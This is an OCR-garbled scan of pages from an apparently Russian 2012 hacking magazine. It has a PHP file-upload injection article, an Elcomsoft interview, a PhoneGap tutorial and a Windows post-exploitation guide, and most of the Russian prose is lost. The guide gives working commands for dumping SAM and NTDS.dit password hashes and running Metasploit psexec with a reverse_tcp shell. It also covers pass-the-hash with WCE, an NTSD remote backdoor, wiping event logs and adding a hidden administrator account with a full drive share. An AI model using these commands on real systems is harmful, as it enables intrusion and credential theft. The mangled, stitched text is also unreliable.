-. Uni-
027
COVERSTORY
-
. Windows-aax n
.
.
.
$_ FILES.
Qwaza d o t.og .
cfo rm action= "upload.php" method= "POST"

enctype= "multipart/form-data" >
ci nput type= "Hidden" name= "AX_FILE_SIZE"
value= "leeeeeee" >
<input type= "file" name= "file[tmp_name][" >
cinp ut type= "file" name= "file[size][" >
<input type= "file" name= "file[name][" >
BlackFan, , ,
.
. , ,
ci nput type= "submit" value= "submit" >

</form>
- $_FILES :
foreach ($_FILES[ "file" ][ "tmp_name" ] as $key => $name)

{
echo "Size:" .$_FILES[ "file" ][ "size" ][$key]. "cbr/>\r\n" ;
echo "tmp name: " .
$_FILES[ "file" ][ "tmp_name" ][$key]. "cbr/>\r\n" ;
$_FILES[ "file" ][ "tmp_name" ][ "[name" ]

n :
$_FILES[ "file" ][ "tmp_name" ][$key]

i f ($_FILES[ "file" ][ "size" ][$key] >0 &&
$_FILES[ "file" ][ "size" ][$key] <1024)
echo "Ok<br/>\r\n" ;
copy($_FILES[ " file" ][ " tmp_name" ][$key], 'test-txt' );
$_FILES ( ,
) .
, .

( upload.php),
}
}
L-, secet.
,
php, , upload .php,
1.
secret.php,
(, , <?php ?>).
~-::
class
'li~t./SocJr:~t/i!lt:ta.php' ;
St.reaa_Filter_iarr.socJtet
2. , <<1 >> .
<< 1 .
extud8: ._,_.er_tilter
(
t
PIUVJISG - :
J. ;
t. UOict
,
:
prot.ect.ec1. $tiarta:
proucted
$ht~;1 ;
protected. faock 1;
$_FILES[ "file" ][ "size" ][$key] >0

"' @pat:u z:~sourc~ $ in

"' Qpara~~. te:soutce liout
Qparaa int ''consuae:d
Qparu bool liclo:sinq
Breturn int
'1
.P*Jit: hllcti.oa tilter (Hn, $out, " consuud, $clos1nq)
<<f ile[tmp_ nameH secet.php,

- <<1. ,
test .txt.
secet . php, txt,
wld.le
( liUcket
streaa_uc.ket_uke_wteale ( Hn ))
, .
swi.td. f'this- node ) (
.....,
PRIVJISG:
1ith1s->t.io.z:t:a->sessaqe (ftha->chonnel ,
lt ::
'ucket->date );
, ,
Content-Type (, ) .
n ,
:. lt: : NOICI :
defa.lt :
lithis -> tiarra->nouce:l!essaqe ( lit.hi.s-><:h~l .
liucke:t->da.ta l:
test .txt. !
"....,
<<
licon:sua!:d -
Sbuc.t:et- >do.t..a.le:n;
streaa_ucket_app~d ( ,out,
'uctet);
move_uploaded_file .
. (, ,
, )-
/"
r:il r i nitiali:r:e:r
imageceatefom*/image *.
@retum bool
, , ,
'1
.-uc h8ctioa o.c:reu.e ()
. ,
(1sset( lit.his->par;8:a5{ 'socket' ))) (

lisock ~ m.aa~ ~this->parus [ 'sock~t' ];
( 1.ss~ t( Hh1s->paraas { 'chann~l' ]))
HJus- >channe.l -
$img = imagecreatefromjpeg($_FILES[ "filename" ][ "tmp_name" ]) ;

imagejpeg($img, "uploads/" .$_FILES[ "filename" ][ "name" ]);
~thls->poru.s { ' chann~l'
);
JPEG,
U
( 1.ss~ t(~th1s->par~ [
Sth1s->ted~
aobl' JI) (
Sth1s->a raas r 'aod~'
1:
IF- .
, -
onCeat e n
028
. , ,
01 /156/20 12
. ,
,
.
, imageceatefom*
,
, l
, .,
2009 ,
, . ,
, G-
base64_ecode ,
<< >> !!, <<. >> <<[ >> !
, , :
!.
$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64J" . base64_encode(
. , L
isql_result_array( 'imagedat~]));
imagejpeg($jpegimage);
,
, .
,
,
<form action=>
<input name= "goodvar .(" >
<input name= "goodarray(foo)" >
<input name= "badvar[ [" >
<input type=submit>
</form>
. ,
,
index.php :
, -,
,
, ,
<?php
print_r($_GET);
?>
imageceatefom*/image*, :
:
foreach ($_FILES[ "file" )_( "tmp_ name" ]_E.L$key => $name) {

echo "Size:" . $_FILES[ "file" ][ "size" ]($key]. "<br}>\r\n" ;
echo " tmp name:" .$_FILES[ "file" ) [ "t>_name" ]($key]. "<br/>\r\n" ;
$img = imagecreatefromjpeg(
$_FILES [ "file" ] [ "tmJJ_name" ] [$key]);
imagejpeg($img, ' ./new_' .$ke:,<. '_,jpg' );
ImageDestroy($img);
Array
(
[goodvar_] =>
[goodarray] => Array
(
(foo) =>
}
(badvar _ _ ] =>
l.jpg ,
, ,
S- Contet-Ty pe:
php ~//filter/read%3dconvert.lightning_template_filter /
Array
(
(goodvar_] =>
(goodarray) => Array
(
[foo] =>
reso_urce%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
,
! , ,
, imageceatefomjpeg .
(badvar_ . [] =>
,
,
.
, .
$_FILES,
.
# 54939 file path injedion
Y~.tlity
Sunlitted: 201 1 -52113: 58U
FI'OO'I:I:korowkzlt gnaldotc:om
status:Ciowi
PP\IeniOrl : 5.3.6
ln RfC1867 file
~ fllen'le
dd: 2011--13
21 :48 UfC
Mllgned:~
P4dl.age: ~
OS:rnlevtt
CVE-IO:Zilli..:.ZZOZ
, .
, - ,
n
01 / 156/ 201 2
, , . ::
029
COVERSTORY
S,
&

. .
- : n:
~~ n.

E\comsoft.
ona:~vanced eBook ss,

n_~1 ,
- Defcon .

r.t
.... ,
IT, , ?
il !
~ . .- . ][J,
, 6. -
100 .
20

. ,
- ... , ,
- ,
. -
.

.
,
- ,
. ,
, - ...
<< ,
.
, , . <<>>

<<
4,5
6 .
91- .
,
,- .
,
. - , .
COVERSTORY
, ,
Elcomsoft,
, , ,
. ,
. , ,
, . :
, :
<<, >>.
, ,
. n
. -
, .
... .
r.1
APPLE
.:;.t ,
,
, ,
r.1
, .
.:;.t ELCOMSOF
ADOBE
?
l ,
l ,
~ ,
compute foesics.
, ,
~ ,
passwod v, ,
- ,
. , ,
, ...
Apple
. , ,
, .
, .
, ,
Recovey . -
[ 97- !
. ,
compute
Active
EFS
diectoy.
r.1
. . . PDF
ELCOMSOF ... ?
foesics . ,
pdf .
~
, ,
. : << , ,
>>.
IT.
80 %.
l ,
. ,
.
,
,
r.1
.:;.t ADVANCED
PROCESSOR,
, -
2001
DEFCON?
l , . ,
~ ,
<<
>>.
. :1
df-, .
, Defco
2001
, - .
1 ,
2001
~ ,
, - .
- .
, .
, ,
. ,
, <<
. 90-
, .
>>. , ,
- ,
Defco.
, ,
, .
, ,
, ,

ELCOMSOFT.
r,1
Elcomsoft,
12
20
Adobe.
, <<
Def co ,
.:;.t >> .
Advaced
1 .
1 , , , ...
. ,
~
Access, . ,
... .
~ ,
, ,
, ,
Apple, iOS [ ,
iPhoe 45 iPad21.
. -
, .
, -
, ,
032
eBook
ss,
? :1
01 /156/2012
. ,
.
- , .
, , ,
,
, .
- .
r.1
1.;.1 ? <<
>> ?
l _ .
~ ,
,
21
.
,
11
-,
,
.
,
. -
, ,
, ... ,
. :) ,

, - .
,

. ,
,
.
- .
, - ...

, .
r.1
l , ... ,
, ,
1.;.1 ADOBE
. ,
, .
- Spot the fed ! ).
. ,
l , , -,
, , .
~ Adobe
!, ),
. <<>> -
Adobe,
Adobe
, -
-.
, , .
, : <<,
<<>>. ,
, , >> .
, ,
- ,
: <<n>>,
. ,
, ,
, , ,
-,
, .
11
. .
, -
r.1
, .
, ,

Elcomsoft.
1.;.1
, ,
<<
, , .
<<n
>> .
, ,
. .
. :
, ,
l ~
<<, >>. ,
~ ,
, .
- <<>>.
01 /156/2012
033
COVERSTORY
, .
? ,
, .
- ?

n. ,
, , , ,
l .
. ,
~ .
. ,
, .
, -
Hackes Oevelopes
>> >> .
, .
r.1
. . . ?
l , l -)
~ 50
, Elcomsoft.
Laten,
Kit,
Canon
n ,
.
CONFidece
, ,
Magic
r.1
~-
2.0.
Niko
. lus-)
, .
. . . , ?
, .
, . ,
.
,
l ,
, . .
. .
, -
, .
r.1
6 ,
2001
2002
. ,
5-10
. . . ,
,

. ,
Nikon
r.1
. . .
.
l ,
~ , Pactical
! ),
cyptogaphy
l , ...
. , ,
, ,
~ . ,
. ... ,
, , -
, .
depositio
! ) -
. , .
, , .
. ,
: -
?>>.
r.1
. . . ?
, .
, :
Elcomsoft
, ,
, , ,
2001
...
l , .
~ ,
. ,
- ,
r.1
, ,
. . . 2002.
, . ,
r.1
, , ,
Elcomsoft
~ ,
CONFIOENCE 2.0
. . .
CANON.
Puic
lteest l. ,
1 %
. ,
l ,
. ,
~ I) .
- : n
. ,
>>.
. .
, n
, ,
, ,
Elcomsoft
17
3000, ,
3500.
, ,
. n
300,
IT,
,
. :::
01 /156/2012
Preview
30 .
.
11,

n n
n n
: n ~ n
~n ~ n
.
. n
n
.
n n
n n, n
Lotus Domino
Contolle n n
.
n, n,
n I
PCZONE
36
HTML5
A nd oid
n n,
? n.
- .
n n
, n
n .
n .
iOS,
MALWARE
500 n,
. n
n .
01/156/2012
DUQU
n
,
n n n
Stuxnet.
I!
,
MBR,
n,
5 nn
.
035
PCZONE
PhoneGap:o
HTML5
- ,
,
.

iOS,
todo list
Windows 8,
, , , n
HTML5.
n, .
, n n
n n
Adroid
, -
, - , n
CSS!,
PhoneGap. n
HTML, JavaSc i pt
n n nn n:
Windows Phone,
lk,
WebOS,
Symian
iOS, Andoid,
Bada.
n n n
. , n
Objective-C
Java
PhoneGap.
[n, Objective-C iOS), API

n n,-

PhoneGap API.
HTML5
L-, << >> , !
API
n n
, n n n
: , n, [
), n , ,
! ) , . .
,
._.....
-~ --
---
...........
- .
n jQuey Moile Secha,
,
[ n ) .
n , n
, n n n .
- .
iOS- -,
AppStoe, n
:). : ,

036
iOS
, , , Andoid. ,
n ,
01/156/20 12
PhoneGap: HTML5

, jQuey Moile.
JS-
n [ n
l n . ,
,
! JQue y Moile
[jqueymoile.com/download l n n
n, :
images/ [n n
jq-moilel;
index.css;
index.html;
index .js;
jquey.js;
jquey.moile.min.css;
jquey.moile . min.js.
,
. n
index.html.
, <<
>> << >>.
cdiv data-role= "page" data-dom-cache= "true"

class = "page- map" id= "index" >
cdiv data-role= "header" >
hl > n / hl >
href= "#points" class= "ui-btn-right" id= "menu-points"
data-transition= "pop" > To c/a>
c/ div >
cdiv data-role= "content" >
cdiv id= "map-canvas" >
! -- -->
, .
iOS .
c/ div>
c/div>
c/div>
data-dom-cache="true" ,
n n << n ,
. <<>>
n, : <<
data-transition="pop", << n >>
, . AppStoe
<< n >>. ,
, n >> ,
jQuey Moi l e, [ it.ly/vtXXM I .
n . ,
n. ,
n n
.
, ,
PHONEGAP
. :
n -n , n
, PhoneGap n iOS.
PhoneGap
n , n n
<< >> . !
J S- jQuey jQue y Mobile [ jqueymobile . com l,
PhoneGap Build [build .phonegap.com l n .
- Google Maps v.
: n .
. ,
, n
, .
[ << >>!. ,
- <<
>>
API.
. lgithub.com/
phonegap/phonegap-p luginsl,
iPhone, Android, Palm, Bla ckBerry. iOS
20 r: BarcodeScann er [ -!. AdPIugi [ iAdl, Nati veCont rol s l iOS
locaiStoage .
l .
<< >>, -
<< >>. n,
01 /156/2012
PhoneGap ,
037
PCZONE
EnableViewportScale
Externa!Hosts
n :
ltemO
ltem 1
cdiv data-role= "page" data-dom-cache="true"

class="page-pints" id= "points" >
cdiv data-role= "header" >

href= "#" data-theme="b" data-icon= "delete"
Boolean
00 Array
id= "delete-all" >Ya </>
String
String
String
..
NO
(41tems)
csi .gstatic.com
.googleapis.com
maps.goog le.com
String
Boolean
maps.gstatic.com
NO
ExternaiHosts
chl>Toc/hl>
//
self.addPoint(event. latlng,
self.options.radius, message);
self.updatePointslist(); // q
</>
});
</div>
}, false );

href="#index" class= "ui-btn-right"

data-transition="pop" data-direction= "reverse" >
n - .
cdiv>

n n n
cul id="list" data-role="listview"

data-inset= "true" data-split-icon= "delete" >
</ul>
</div>
c/div>
. nn
if (navigator.geolocation) {
/1
n <<>> nn data-tansition=>>pop>>,
data-diection=>>evese>>,
<<>> <<>>.
nn . , .
API Google Maps,
Geolocation AP I
!, n n l:
function gpsSuccess(pos) {
var lat, lng;
if (pos.coords) {
lat
pos.coords.latitude;
lng
pos.coords.longitude;
el se
pos.latitude;
lat
lng
pos.longitude;
self.movePerson( new gm.Latlng(lat, lng));

var latlng = new gm.Latlng(
this .options.lat, this .options.lng);
t his .map = new gm.Map(element, {
zoom: this .options.zoom, //
center: latlng, //
mapTypeid: gm.MapTypeld.ROADMAP, //
disaleDoueClickZoom: true ,
/1 /
disaleOefaultUI: t ru e
/1
/1
/1
/1
window.setinterval( function () {
/1
n n
navigator.geolocation.getCurrentPosition(gpsSuccess,
$.noop, {
enaeHighAccuracy: true ,
maximumAge:
});
});
},
Maps.
Gm-
n,
Google
);
. - :
movePeson n n n
getPointslnBoundsll
t his .person = new gm.Marker({
map: t his .map,
icon: new gm.Markerlmage(PERSON_SPRITE_URL,
new gm.Size( 48 , 48 ))
n, n
- . n-
n ?
HTML5
locaiStoage, n !n
,
l. , n,
});
, !

PERSON_SPRITE_URL n n
Ggl - . - maps.gstatic.
com/mapfiles/c/mod scou t/cb scout spite api OO . png .
, n
, , n,
n . n
click:
- n - Safai Chome.
,
n <<n>> .
gm.event.addlistener(th is .map, 'click' , f unct i on (event)

self.requestMessage( function (err, message) {
11 , ut ,
i f (err) return ;
/1
n h ~ -n n -
038

, n , , n
WebKit . ~
01 / 156/ 2012
PhoneGap:
HTML5
. , , n
Run-
iPhone/iPad
PhoneGap.
index.html ,- . ,
n n,
n
www.
<<t folde
efeences f
any added
foldes.
, .

www.
PhoneGap.
PhoneGap
phonegap-1.2 .0.js
. <<
>>. 5uppoting
plist,
Fil es/PhoneGap.
E xtenai H osts ,
( Google
Mapsl: *gstatic.c om, *googleapis.com, maps.google.com.
,
. -

DOMReady
jQuey :
$1documentl.eadyll. PhoneGap deviceeady,

, .
:
document.addEventListener( "deviceready" , function () {

new Notificator( $( "#map-canvas" )[ ));
/1
11
if (navigator.network.connection.type
Connection.NONE) {

navigator.notification.alert( "He -" ,
iOS
$.noop,
. - (n Denwe
TILE);
}, false);
XAMPPI, ,
.
n , . ,
-. ,
. navigato. notification.alet
alet, ,
PhoneGap,
. ,
, netwo k .
i05-. ,
connection I it . ly/uEyRwz l I it.ly/tkvzE2 1.
PhoneGap
IDE
i05,
05 10.6+ (
05 10.61, Xcode
i05 50 . 50 , n
Apple . Xcode i05 50 l deve l ope.
document.add Eventlistener( "touchmove" , function (event) {

event.preventDefault();
} , false );
app l e . com/devcente/ i os/index.act i on l . ,
4 . , '
Apple (
alet confim ,
n
PhoneGap:
navigator.notification.confirm( 'Ya ?' ,
function (button_id) {
n , 5t,
!. ,

Objective-C.
PhoneGap,
PhoneGap i05.
lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,
i05 .
, Xcode PhoneGap.
i05
UI-
jQuery Moblle- ,
ile,
01/156/2012
PhoneGap
IDE
Zepto.js
[phonegap.com/tools l: 5encha Touch, lmpact, Dojo Mo-
039
PCZONE
i f (button_id === 1) { //
self.removePoint(point);
}
TILE );
},
, n,- , n
i.i n .
, n ln ,
l ,

56 .84484567007557 ...
Ph oneGap:
navigator.geolocation.watchPosition( function (positio n) {

self.movePerson( new gm.LatLng(
position.coords.latitude,
position.coords.longitude));
}, fu nction (error) {
navigator. notification.alert(
'code: + error.code + '\nmessage: ' + error.message,
$.noop,
56.84583899763894 ...
hG-n
TILE
);
}' {
frequency:
iOS
iOS,
! , nn
iOS
D eve l ope
Pogaml. n
});
n n
IAndoid,
-
, . n
Run
Windows Phonel
App le,
n . ,
, n n n n
- . n
$99
, n
n .
iS - ' nn n
n n . n n
n nn
iPad
n,
n .
:1.
n Stoe.
$99 n n ,
n - .
iPhone, iPod
Xcode.
iOS
Apple
: n n
nn n n iS -
! , n
n n : it .l y/tD6xA !I . ,
n
. .
?
n -n
n n n
PhoneGap,
n ,
PhoneGap.
iOS n
Objective-C,
n n
n n n , n
. .
API PhoneGap.
n n, n An d o id
Appcelerator Titanium
lwww . appceleato. com l.
Titanium
iPhone,
Andoid
Moile
n
n lk.
, n n

nium
IDE .
Tita-
n, n
$49 ].
$120 . l t
, n
Titanium
25
. n n n
Apache 2.
7,
n, n !
:
n n
lphonegap .co m/apps ].
n -
iOS An-

n , -
: $199 n $349
iOS
Andoid. n n
IDE
n , JavaScipt.
01.0
PhoneGap-
n n n
n. n
, n n,
HTML+JS
- n
n , n n
doid. . ,
Ph oneGap,
n,
OpenGL.
phonegap .
com/sta t l . n ,
. n
Corona SDK l www . anscamoile . com/coona l .
Windows
, - n
. ,
Ph one Gap
n Nitoi
n l n n GitHub: github .com/

,
phonegap l.
n n Ni toi n
Adobe .
, nn n n n n
? ::
01 / 156/2 01 2
. .
PCZONE
Ant
la.zhukov!Oreal.xakep.rul

WINDOWS-APOE

WINDOWS-CCTEM

, ,
?
, .
:
S-, LM/NTLM- xe
;
LSA, LM/NTLM-xe
, ;
, Sh-
,
! , ,
! .
, -.
:
, ,
PWDUMP
FGDUMP
NTLM.
.
.
. NTLM / LM-xe
.
, DLL-
SeDebugPivilege . ,
la NT AUTHORIY\SYSTEMI .
, :
! Live CDI, , -t lwww.piotrbaia . com/all/kon-boot l,

.
l NT AUTHORITY\
SYSTEM l ,
Ea syHack .
.
pwd ump lwww.foofus .net/-fizzgig/pwdump l fgdump lwww.

foofus .net/-fizzgig/fgdump l.
, .
:
pwdump localhost
fgdump . exe

127.0.0.1.PWDUMP
l ! 127.0.0.1 .CACHEDUMP
l ! .
01/156/2012
Widows-apoe
,
, .
, ,
pwdump,
> pwdump - mytarget . log -u MYDOMAIN \s omeuser

' lamepassword' 10 . 1.1.1
10.1.1 .1 -
, MYDOMAIN \
someuse- , la mepasswod-
, mytaget.log - .
pwdump, fgdump
> fgdump .exe -f hostfile . txt -u MYDOMAIN\someuser

1 >> -
hostfile.txt- ,
w n n n
pwdump
10
, <<-
! !.
,
fgdump.exe.
VOLUME SH AOOW
pwdump
n n n
Cedentials Edito (WCEI
Windows
vssown.vbs
SERVICE
fgdump
itools .l anmaste53 . co m /vss ow n . v bs l, .
, ,
. ,
SAM,
, . ,
cscript vssown. vbs /start.

cscript vssown.vbs /c reate.
: cscript vssown. vbs /list.
, -
Device object \\ ?\G LOBALROOT\

Device\HaddiskVolumeShadowCopy14 >> ! 14 -
!. .
. - ,
1.
, -
SYSTEM .
, ,
. , ,
\\?\GLOBALROOT \ Device\HarddiskVolume5hadowCopy14\
wi ndows\sys tem32 \ config \ SYSTEM .
\\?\GLOBALROOT \Device\HarddiskVolumeShadowCopy14\
windows\sys tem32 \co nfig \SAM .
, .
, >> ,
Volume Shadow Sevice ! ! .

Windows S v 2003.
, , System
Sta te ntbackup
IVolume Shadow f Shaed Folde s l .
2.
, -
SAM in side l i n si d ep o.com/us/saminsi d e.shtm l l

.
l ,
SAM SYSTEMI,
, ,
,
! ,
. ,
\\?\GLOBALROOT \ Device \ HarddiskVolume5hadowCopy14\

windows\ntds\ntds.dit .
Wi nd ows
SAM
SYSTEM. Active Di ecto y

NTDS.DIT, :
, ,
. , -
SYSTEM
NTDS.DIT,
SYSTEM.
n n ?
. _
, , n
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\C uentVesion\

Winlogon\cachedlogonscount 0>>.
, .
csa b abata.com/down l oads/
01/156/2012
NTDS.DIT
, .
Csaba t ,
NTDS.DI T .
PCZONE
ntds dump has h.zip. ,
n n BackTack5 !n
Linu-],
n . ,
.
libesedb:
cd libesedb
chmod + configure
./configure && make
..- .....
...~""..."'
e su~_
. ..s.o
1000
1011.1:
lOM
<~ ...d ~
I ~
'"'"'""'"
11111111111111
<Di ..Od ~
."'...
<Di t>lod ~
<fmptp
O tntuo.,.
-----
f .. 5ae7te7 11tttlA...
O u<c
........
Z01?1..0."'6 1 D:IAIS , .
SAMiside
:
.
, :
cd esedbtools
. / esedbdumphash .. / .. /ntds .dit
/l ibe sedb/esedbtools/ntds.dit.expot/datatable.
. ,

SYSTEM:
cd .. / .. /creddump/
python ./dsdump.py .. /SYSTEM
. /libesedb/esedbtools/ntds.dit.export/datatale
! !
> sudo . /hashgrab2.py

HashGrab v2.e smyen
http: // InterNeT.net
Contact: RuSH4ck3R[at]gmail(dot]com
[*] Mounted /dev/sdal to /mnt/jomATB
[*] Mounted /dev/sdl to / mnt / AZwJU s
[*] Copying SAM and SYSTEM files ...
[ * ] Unmounting partitions . ..
[ * ] Deleting mount directories ..
[*] Deleting [ ' . / jomATB']
>$ ls
hashgrab2.py jomATB.txt
>$ cat . /jomATB.txt
Administrator : HASH
Guest:Sel:HASH
! ] .
smyen : leee:s
, :
HomeGroupUser$:1882:HASH
python . / dsdumphistory .
. . /system .. /libesedb/esedbtools/ntds.dit.export / datatale.

,
! ] .
'
HASHGRAB2+
SAMDUMP2
METASPLOIT
, .
tt.
, .
Metasploit
, ,
. :
Famewok
LiveCO !,
Offline NT Passwod & Registy Edi t o],
meterpreter > run post/windows/gather/hashdump
- ,
.
HashGab2l py 1 337 . get- oot . com / too l s/has h gab2 .

.!] samsump2 l soucefoge.net/pojec t s /ophcack/ f iles /
samdump2 / 2.0.1],
Liv- . HashGab2
Metasploit-
PsExec:
Windows-pae, , n

SAM
samdump2
SYSTEM .
meterpreter > use exploit/windows/smb /psexec

SAMinside
insidepro.comlrus/sami nside.shtml
lm2ntcrack
ighashgpu
www.xmco.fr/lm2ntcracklindex .html
www gol ubev.com/ hashgpu.htm
NL-.
. N
. , -
, L- .
, L- ,
- .
NT -
ighshgu
n.
. ,
GU
, LM-apo-ADMINISTRATOR,
Windows
, , ,
lm2tca c k .
MD4, MD5, SHA1, NTLM,

11g, MySQL5, MSSQL.
01 /156/2 01 2
Windows-napoe
meterpreter > set payload widows/meterpreter/reverse_tcp

meterpreter > set rhost ( ]
meterpreter > set smbpass (
~~-~
-' "'~O.I!ii l!i!
+ il
v - ~ """"'"'" oq~ r..
O t Jt
meterpreter
meterpreter
meterpreter
meterpreter
> set smbuser [ ]

> set lhost [ ]
> exploit
> shell -
ll3.PJI~
:I08Dt69'1D71iill:\117 ,,,
31D6CI'!IXIIW931
AI031RSI~
DlofSOC1(0lll~
. . 31151~ ..
, ,
. ,
. ,

getsystem .
MS09-012,
MS10-015 [KiTrapDDI .
,
NTLM
NTML w
! w !
WINDOWS
CREDENTIALS EDITOR
PASS-THE-HASH
Cain&Abel-
WCE
Pass-the-Hash Toolkit'a,
. -
:1. -
[ NTLM/LM-xe !:
1997
Pass The Hash,
Pass-the-Hash Toolkit. [oss.

coresecu rity.com/projects/pshtoolkit.htmll: IAM.EXE, WHOSTHERE.
GENHASH .EXE. , GENHASH
LM- N- . WHOSTHERE.
wce.exe -1
, -,
- - :

. ,
, :
, / NL- . IAM.

wce.exe -s <userame>:<domai >:< lmhash >:<thas h> \

- <program> .
- ,
[ , , . .l,
,
,
wce.exe -s
:579118C49145815C47ECD267657D3174
Iteret Explorer \ iexplore . exe"
user:Victim:1F27ACDE849935BBAADB435B51484EE
"c: \ Program Files \
NL-,
, << .
<<-S << user

Victim, LM- NTLM-xe <<->>
, .
whosthere.exe-
, . :1
iam.exe -h
administrator:mydomain:AAD384358514@4EEAADB
4358514@4EE:31DCFEeD16AE931873C59D7EeCe89Ce
, , .
, [, l
, , ,
CUDA-Multiforcer
www.cypto h aze.co m /multi fo c e. php
,
. :::
ophcrack
John the Ripper
pfi cr ck.so urceforg . net
www.openwall .cam
n Windows
iw-.
NL-,
Vidia.
-. jum
, ,
inw-. ,
diff',
[ win321 .
MD5, NTLM, MD4, SHA1,

MSSQL, SHA, MD5_PS: md5[$pass.$saltl, MD5_SP:
md5[$salt.$passl, SSHA: base64[sha1 [$pass.$saltll,
DOUBLEMD5: md5[md5[$passil, TRIPLEMD5, LM:
Microsoft LaMan hash .
01/156/2012
NTLM .

. , , Windows-ccee,
? . ,
? - ,
.
n n nwn
nn . n , ,
n n (
nmap, -
w),
ipconf ig /all
ipconfig /displaydns
D NS-e .
-~
/U-. - ,
netstat - nabo
netstat -s
............................................
, .
' etsta t - [ , UDP, ICMP, IPI.
[tcpludplicpmlip]
: ..
j netstat -
: route print
: .
'''''''f'
.,... ....
......................
..... .......
. ..................... . ..................... .
, ,
j netstat - 1 findstr :445
445.
net view
SMB [!.
net user %USERNAME% /domain
l. , ,
[ '/do m ai',
, . .
j net accounts
[ ! .
j.. ~.et ~.c~~.unts /do~~i ~............... .
net localgroup administrators
net localgroup administrators /domain
>> .
... ............................. ..... ................................ .
............ .
!. ".~t .~.~nfig ~o~.~~-t~ti~-~ ................. ,....
.. .. .
: net share
;,
....
S - .
R- .
. . . . ...... ... ....... ....... .... ... ... ........ ....... ......
: type %WINDIR%\System32\drivers\etc\
j hosts
NetBIOS, , , , . .
....... .... ... .... ............................ ......................... ... .................... .... ....................................................................... .
................ .........................
....
hosts.
. ....................................... ..
n enna - .
(n~~ :
n ( r ), ,
, , r nr . .
? .
whoami
'/all' 510 , 510 , !

whoami /all
? ! .
qwinsta
, , - . R- !
!, .
( uame !, , .
........... ... .... ... ................... ...... ...... ...
. ................
..................
- .
. ........................................... .
set
: . USERDOMAIN, USERNAME, USERPRO; FILE, , LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .
systeminfo (XP+I
; , , ,
: , , .
~ , .
qprocess
~ ,
..... ................................
.. . .................
SET
. ~~~ ~
.... ............
~
....................................
schtasks /query /fo csv /v >
~..
10
PID
.. .... .... ....... ... ..... ... .. ... '...... . .............'............ ... . .........
. .........
............... ......... .......... ...... .. .. .. ....... . ..............
J. ..~~.~~~~.~.~~~ ..:~~~~.~., ~~.~~~~.~.~~~.:' .~.'.........................................................!

~ csv, .
%%
, , ,
. , SYSTEM ( Wi7x64l. , , - do_so methig.bat

SYSTEM 15:41 , :
at 15 : 41 / interactive "d:\pentest\do_somethig.bat"
, .
at
. ,............................................ ; ............................ .. .............. ..
~ , . at,
: schtasks (XP+I
.............. ,.: ..
net start
sc getkeyname ""
sc queryex ""
~~.~.~~.~.~~. ~~.~~~ ~~~~~.~~ .~~~~.~~~~~~.~~~~ .~~~.~~.~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1................. ,.... .

sc query
PIO
key
..............................................................................................
j
tasklist (+)
.........................
taskkill [/f] /pid <pid>

taskkill [/f] /im <image_name>
......................... .
.... , .............
PIO
.......
! .~.~~.til~si n~~ .~r.i~eS. .................... .........~.~~.~.~~.~.~~.~:.ll\. ~ ~~~~ l~~.~.~~~~~.~~~ ~ ~:.~~~~..~:..~~ ~.~~~.~~~.~~~~~.: ............................................... .
: gpresult
/z
- .
................................... .................................................................. ....................................................................................... , ... ,............................................. ........... :

.-
nor. , noro. n ,
n .
, (, . . !.
wevtutil el
: wevtutil qe <LogName>
: ..
~~~~.~.~i~ c'..~.~~.~~.~.~.~~ ........ . ......
: del %WINDIR%\*.Iog / /s /q /f
.....
~~~~~~~ ~.~~~~~~' ~~~............ ............ ...... ................ ..... ................... ............... ............................................................... .
WINDOWS.
Windows - n n
no n n n. -
n - nn.
%windir%\System32\cmd .exe /
''%SystemRoot%\syst em32\Dism .
/online /get-features
, .
Windows Vista SP1/7/2008/2008R2, no , te lnet ft- ..
....................................................................
%windir%\System32\cmd.exe /
''%SystemRoot%\system32\Dism.
" /online /enaie-feature 1
featurename:TFTP
TFTP. F - tftp.exe
system32.
Windows
Vista
ntsd.exe,
Ntsd -server tcp :port=1337 cal.exe

Ntsd -remote tcp:server=<ip-
[ ), - .
apec>, port=1337
[ ). <<.shell>>,
.
NTSD
B ack d oo.
i .
net use
- , n
n. n: w
, , n,
(n, n n).
reg save HKLM\Security security.

hive
~ security . , , system.
.....................................................................................
..
'"
""
.. ...
.. .......
..
................................................... ..
!. .
~~~-~-~-~--~~-~-~-~~-~ ~--~--~.:~~~~ ........... ..~~--~-~- -~-~-~~~ -~-~~~~-~-~-~-~ - SAM, ~ .~~~~-~:.~~~~--~~ -~--~-~~-~~-~~~-~-~~~: ............................. .......... .......... .
add
[\\
9. ][\
maln
etiPaddr\] [Re Do] g

g
!: ,
[ TagetiPadd l.
<<R EG ADD HKLM\Sof tware\MyCo /v Data /t REG_BINAR Y /d f e340ead >> [ : Oata,
~ : REG_BINARY, : fe340eadl .
.. ...................... "...........
reg export [RegDomain]\[Key]

[FileName]
reg import [FileName]
reg query [\\TargetiPaddr\J [RegDomain]\[ ] /v [Valuename!]
........
................
~ n .
.
; n n .
, , .
w , , :
sam_backup.dat?
w, ,- , .
tree C:\/f /> C:\output_ of_tree.txt
dir \ /s / 1 find
/1
"search_string"
: , .
d i 1\1 1/sl
ba se 1/bl se a c h_s t i n g, .
, ,
- WMI (Windows Management lnterfacel.
CWMIC
, WI- (WMICI:
, , .
wmic baseboard get Manufacturer, Model, Product,

SeriaiNumber, Version
WMI
. , W I - lcompu t esyste m, bios, ,

, base b oadl n .
. .
wmic nicconfig get caption, macaddress, ipaddress,

DefaultiPGateway
: , - , I- ,
.
wmic nicconfig where "IPEnaed = 'TRUE ' and

DNSDomain 15 NOT NULL" get DefaultiPGateway,
DHCPServe r, DNSDomain , DNSHostName, DNS ServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnaeLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format :li st
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status
n , .
wmic os get bootdevice, caption , csname, currenttimezone, installdate, servicepackmajorversion,

servicepackminorversion, systemdrive , version,
windowsdirectory /format:list
wmic product get Caption, lnstaiiDate, Vendor
wmic path win32_product where " name =

ware Update"' call Uninstal
'
Soft-
: Softwae Update.
, .

netuserhackerhacker/add
: net localgroup administrators /add hacker

. net localgroup administrators hacker /add
; ....................................... ..
: net share nothing$=C :\ /grant:hacker,FULL /unlim: ited
hacke .
h acke .
: hacke .
...........................................................
: net user username /active:yes /domain

